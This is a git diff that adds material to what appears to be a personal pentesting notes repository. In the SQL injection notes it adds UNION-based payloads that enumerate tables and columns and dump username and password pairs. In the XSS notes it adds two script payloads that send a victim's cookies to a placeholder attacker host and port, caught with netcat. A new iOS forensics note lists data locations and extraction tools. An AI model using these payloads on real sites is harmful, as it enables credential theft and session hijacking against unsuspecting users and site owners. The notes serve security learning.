diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md
index 00efb8a..d1432d3 100644
--- a/exploit/sqli/sqli.md
+++ b/exploit/sqli/sqli.md
@@ -52,6 +52,22 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
 
 * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
 
+#### SQL Functions
+* Use sql functions to fumble the tables & cols via union
+* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
+* Extract tables 
+```sql
+1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
+```
+* Extract cols
+```sh
+1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
+```
+* Data from cols
+```sql
+1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
+```
+
 ## Tools
 ### SQLmap
 * [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
diff --git a/exploit/web/xss.md b/exploit/web/xss.md
index e7fea4c..c0234c8 100644
--- a/exploit/web/xss.md
+++ b/exploit/web/xss.md
@@ -17,6 +17,13 @@ This is where a malicious string originates from the websites database.
 ```
     * Navigte to `/logs` and take sid
 
+* Open nc 4444 and
+```sh
+<script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
+<script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>
+
+```
+
 ## Reflected XSS
 In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
 
diff --git a/forensics/ios.md b/forensics/ios.md
new file mode 100644
index 0000000..642ba92
--- /dev/null
+++ b/forensics/ios.md
@@ -0,0 +1,32 @@
+# iOS Devices
+
+## Trust Certificates
+* Exchanged between 'Trusted' devices and the charging iOS device.
+* iTunes access to the iOS device has elevated permissions using the cert.
+* Keychain may be extracted through iTunes.
+
+## Interesting Files
+* `ResetCounter.plist`, hard Reset diagnostic counter
+* `com.apple.preferences.datetime.plist`
+* DB tables
+    * Atendee
+    * Task
+    * Event
+* Mail
+* Safari
+* Cookies
+* Pictures
+* Addressbook
+* SMS
+* Voicemail
+* WiFi Keys
+
+## Backups
+Encrypted and unencrypted backups can be chosen in the iTunes menu.
+
+
+## Tools
+* [iFunbox](https://www.i-funbox.com/en/page-about-us.html)
+* [O.MG cable](https://shop.hak5.org/products/o-mg-cable)
+
+